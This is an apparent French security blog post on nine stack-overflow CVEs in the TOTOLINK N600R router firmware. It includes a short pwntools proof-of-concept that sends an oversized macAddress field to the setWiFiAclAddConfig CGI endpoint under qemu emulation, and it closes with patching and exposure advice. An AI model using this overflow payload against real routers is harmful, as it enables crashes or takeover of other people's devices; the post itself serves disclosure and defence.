TOTOLINK est de nouveau à l’affiche sur le site. On peut reconnaître une chose à ce constructeur, quand ils font un produit ils savent vraiment mettre le paquet sur les failles de cybersécurité !!!
LE N600R est donc un routeur wifi avec comme principale caractéristiques d avoir … 9 failles critiques CVE !!!!
- CVE-2022-29399
- CVE-2022-29398
- CVE-2022-29397
- CVE-2022-29396
- CVE-2022-29395
- CVE-2022-29394
- CVE-2022-29393
- CVE-2022-29392
- CVE-2022-29391
La version du firmware cible du TOTOLINK N600R est : V4.3.0cu.7647_B20210106
Toutes ces failles sont de types stack overflow.
Plus d ‘info sur :
Exemple de script d'attaque sur TOTOLINK N600R
from pwn import *
import json
data = {
"topicurl": "setting/setWiFiAclAddConfig",
"wifiIdx": "0",
"addEffect": "0",
"comment": "AAA",
"macAddress": "A"*0x200 + ":" + "A"*0x100 + ":A:A"
}
data = json.dumps(data)
print(data)
argv = [
"qemu-mips-static",
"-L", "./lib",
"-E", "LD_PRELOAD=./hook.so",
"-E", "CONTENT_LENGTH={}".format(len(data)),
"-E", "REMOTE_ADDR=192.168.2.1",
"./cstecginew.cgi"
]
a = process(argv=argv)
a.sendline(data.encode())
a.interactive()
Comment protéger votre N600R
Comme toujours la première façon de se prémunir est d’éviter que ce type d’équipement ne soit accessible depuis le net.
Ensuite faite vos mise à jour pour passer sur la dernière version :
http://www.totolink.cn/home/menu/detail.html?menu_listtpl=download&id=2&ids=36